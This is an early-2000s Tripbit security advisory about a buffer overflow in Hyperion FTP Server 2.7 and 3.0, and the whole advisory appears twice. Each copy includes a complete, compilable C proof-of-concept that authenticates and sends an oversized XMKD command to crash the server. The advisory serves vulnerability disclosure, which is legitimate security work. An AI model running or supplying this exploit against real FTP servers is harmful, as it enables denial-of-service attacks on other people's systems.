Rushjo@tripbit.org
04/04/03, 19:35
TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0
contributed by: rushjo
================================================== ==============================
Tripbit Security Advisory
TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0
================================================== ==============================
PROGRAM: Hyperion FTP Server
HOMEPAGE: http://www.mollensoft.com
VULNERABLE VERSIONS: 2.7 and 3.0 (newest version)
RISK: Medium/High
IMPACT: Denial Of Service & possiable Remote-Root-Access
RELEASE DATE: 2003-03
================================================== ==============================
TABLE OF CONTENTS
================================================== ==============================
1................................................. .........DESCRIPTION
2................................................. .............DETAILS
3................................................. .............EXPLOIT
4................................................. ...........SOLUTIONS
5................................................. .......VENDOR STATUS
6................................................. .............CREDITS
7................................................. ..........DISCLAIMER
8................................................. ..........REFERENCES
9................................................. ............FEEDBACK
1. DESCRIPTION
================================================== ==============================
Hyperion FTP Server is an small FTP Server Program for Windows. It is
made by Mollensoft and it supports all FTP Server commands.
2. DETAILS
================================================== ==============================
¤ Remote DoS :
A security vulnerability in Hyperion FTP server allows remote attackers
to cause the server to crash by executing a specific command (mkdir
command) with a buffer of 251 and more bytes in length or more.
The command can be issued to the FTP server either by a valid
authenticated user or by an guest/anonymous account (if this is
enabled).
3. EXPLOIT
================================================== ==============================
This is an Proof of Concept Exploit of this Buffer Overflow Vul-
nerability.
NOTE: This is only for INFORMATION purposes and not for any
destructive acts!
/************************************************** *****************************
*
* Denial of Service Attack for Mollensoft Hyperion FTP Server 3.0
* ---------------------------------------------------------------
*
* Note: This paper is ONLY for INFORMATION purposes and not for any
* destructive acts!
*
* Note: Dieser Text ist ausschließlich NUR für Informationszwecke gedacht
* und nicht für irgendwelche Zerstörerischen Taten!
*
*
* Tripbit Security Development
* Author: posidron
* Website: tripbit.org
*
* Vulnerable Version:
* + Hyperion 3.0
* + Hyperion 2.7
*
* Compile:
* bcc32 -lx ws2_32.lib hyperion.c
*
* Execute:
* hyperion <host> [user] [pass]
*
* Thx:
* MisterMoe, Rushjo, Tec, PeaceTreaty, seth
*
************************************************** *****************************/
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#define A 0x41
#define PORT 21
#define MAX_BUFFER 255
#define MAX_PACKET_BUFFER 1024
int winsock(void);
void usage(char *prog_name)
{
printf("Usage: %s <host> [user] [pass] \n", prog_name);
exit(-1);
}
int main(int argc, char *argv[])
{
char buffer[MAX_BUFFER], packet_buffer[MAX_PACKET_BUFFER];
long rc = winsock();
SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
SOCKADDR_IN addr;
if(argc < 4) usage(argv[0]);
if(s == INVALID_SOCKET)
{
printf("Can't start Socket!, Error code: %d\n", WSAGetLastError());
return 1;
}
if(rc != 0)
{
printf("Can't start Winsock!, Error code: %d\n", rc);
return 1;
}
memset(&addr, 0, sizeof(SOCKADDR_IN));
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr((char*)argv[1]);
rc = connect(s,(SOCKADDR*)&addr, sizeof(SOCKADDR));
if(rc == SOCKET_ERROR)
{
printf("Can't connect!, Error code: %d\n", WSAGetLastError());
return 1;
}
printf("Connected to %s \n", argv[1]);
printf("Preparing attack!\n");
recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0);
sprintf((char *)packet_buffer,"USER %s\r\n",argv[2]);
send(s,(char *)packet_buffer,strlen((char *)packet_buffer),0);
recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0);
sprintf((char *)packet_buffer,"PASS %s\r\n",argv[3]);
send(s,(char *)packet_buffer,strlen((char *)packet_buffer),0);
recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0);
memset(buffer,A,MAX_BUFFER);
buffer[MAX_BUFFER-1]=0;
sprintf((char *)packet_buffer,"XMKD %s\r\n",buffer);
send(s,(char *)packet_buffer,strlen((char *)packet_buffer),0);
recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0);
Sleep(1000);
shutdown(s, 2);
closesocket(s);
WSACleanup();
printf("Attack done!");
return 0;
}
int winsock(void)
{
WSADATA wsa;
return WSAStartup(MAKEWORD(2,0), &wsa);
}
This error will produce an "Segmentatin fault" in the Hyperion FTP Server.
4. SOLUTIONS
================================================== ==============================
No solution for the moment.
5. VENDOR STATUS
================================================== ==============================
The vendor has reportedly been notified but no answer of to this report.
6. CREDITS
================================================== ==============================
Discovered by posidron
7. DISLAIMER
================================================== ====================
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
8. REFERENCES
================================================== ====================
- Original Version:
http://www.tripbit.org
9. FEEDBACK
================================================== ====================
Please send suggestions, updates, and comments to:
Tripbit Security Advisory
http://www.tripbit.org
rushjo@tripbit.org
posidron@tripbit.org
contributed by: rushjo
================================================== ==============================
Tripbit Security Advisory
TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0
================================================== ==============================
PROGRAM: Hyperion FTP Server
HOMEPAGE: http://www.mollensoft.com
VULNERABLE VERSIONS: 2.7 and 3.0 (newest version)
RISK: Medium/High
IMPACT: Denial Of Service & possiable Remote-Root-Access
RELEASE DATE: 2003-03
================================================== ==============================
TABLE OF CONTENTS
================================================== ==============================
1................................................. .........DESCRIPTION
2................................................. .............DETAILS
3................................................. .............EXPLOIT
4................................................. ...........SOLUTIONS
5................................................. .......VENDOR STATUS
6................................................. .............CREDITS
7................................................. ..........DISCLAIMER
8................................................. ..........REFERENCES
9................................................. ............FEEDBACK
1. DESCRIPTION
================================================== ==============================
Hyperion FTP Server is an small FTP Server Program for Windows. It is
made by Mollensoft and it supports all FTP Server commands.
2. DETAILS
================================================== ==============================
¤ Remote DoS :
A security vulnerability in Hyperion FTP server allows remote attackers
to cause the server to crash by executing a specific command (mkdir
command) with a buffer of 251 and more bytes in length or more.
The command can be issued to the FTP server either by a valid
authenticated user or by an guest/anonymous account (if this is
enabled).
3. EXPLOIT
================================================== ==============================
This is an Proof of Concept Exploit of this Buffer Overflow Vul-
nerability.
NOTE: This is only for INFORMATION purposes and not for any
destructive acts!
/************************************************** *****************************
*
* Denial of Service Attack for Mollensoft Hyperion FTP Server 3.0
* ---------------------------------------------------------------
*
* Note: This paper is ONLY for INFORMATION purposes and not for any
* destructive acts!
*
* Note: Dieser Text ist ausschließlich NUR für Informationszwecke gedacht
* und nicht für irgendwelche Zerstörerischen Taten!
*
*
* Tripbit Security Development
* Author: posidron
* Website: tripbit.org
*
* Vulnerable Version:
* + Hyperion 3.0
* + Hyperion 2.7
*
* Compile:
* bcc32 -lx ws2_32.lib hyperion.c
*
* Execute:
* hyperion <host> [user] [pass]
*
* Thx:
* MisterMoe, Rushjo, Tec, PeaceTreaty, seth
*
************************************************** *****************************/
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#define A 0x41
#define PORT 21
#define MAX_BUFFER 255
#define MAX_PACKET_BUFFER 1024
int winsock(void);
void usage(char *prog_name)
{
printf("Usage: %s <host> [user] [pass] \n", prog_name);
exit(-1);
}
int main(int argc, char *argv[])
{
char buffer[MAX_BUFFER], packet_buffer[MAX_PACKET_BUFFER];
long rc = winsock();
SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
SOCKADDR_IN addr;
if(argc < 4) usage(argv[0]);
if(s == INVALID_SOCKET)
{
printf("Can't start Socket!, Error code: %d\n", WSAGetLastError());
return 1;
}
if(rc != 0)
{
printf("Can't start Winsock!, Error code: %d\n", rc);
return 1;
}
memset(&addr, 0, sizeof(SOCKADDR_IN));
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr((char*)argv[1]);
rc = connect(s,(SOCKADDR*)&addr, sizeof(SOCKADDR));
if(rc == SOCKET_ERROR)
{
printf("Can't connect!, Error code: %d\n", WSAGetLastError());
return 1;
}
printf("Connected to %s \n", argv[1]);
printf("Preparing attack!\n");
recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0);
sprintf((char *)packet_buffer,"USER %s\r\n",argv[2]);
send(s,(char *)packet_buffer,strlen((char *)packet_buffer),0);
recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0);
sprintf((char *)packet_buffer,"PASS %s\r\n",argv[3]);
send(s,(char *)packet_buffer,strlen((char *)packet_buffer),0);
recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0);
memset(buffer,A,MAX_BUFFER);
buffer[MAX_BUFFER-1]=0;
sprintf((char *)packet_buffer,"XMKD %s\r\n",buffer);
send(s,(char *)packet_buffer,strlen((char *)packet_buffer),0);
recv(s,(char *)packet_buffer,MAX_PACKET_BUFFER,0);
Sleep(1000);
shutdown(s, 2);
closesocket(s);
WSACleanup();
printf("Attack done!");
return 0;
}
int winsock(void)
{
WSADATA wsa;
return WSAStartup(MAKEWORD(2,0), &wsa);
}
This error will produce an "Segmentatin fault" in the Hyperion FTP Server.
4. SOLUTIONS
================================================== ==============================
No solution for the moment.
5. VENDOR STATUS
================================================== ==============================
The vendor has reportedly been notified but no answer of to this report.
6. CREDITS
================================================== ==============================
Discovered by posidron
7. DISLAIMER
================================================== ====================
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
8. REFERENCES
================================================== ====================
- Original Version:
http://www.tripbit.org
9. FEEDBACK
================================================== ====================
Please send suggestions, updates, and comments to:
Tripbit Security Advisory
http://www.tripbit.org
rushjo@tripbit.org
posidron@tripbit.org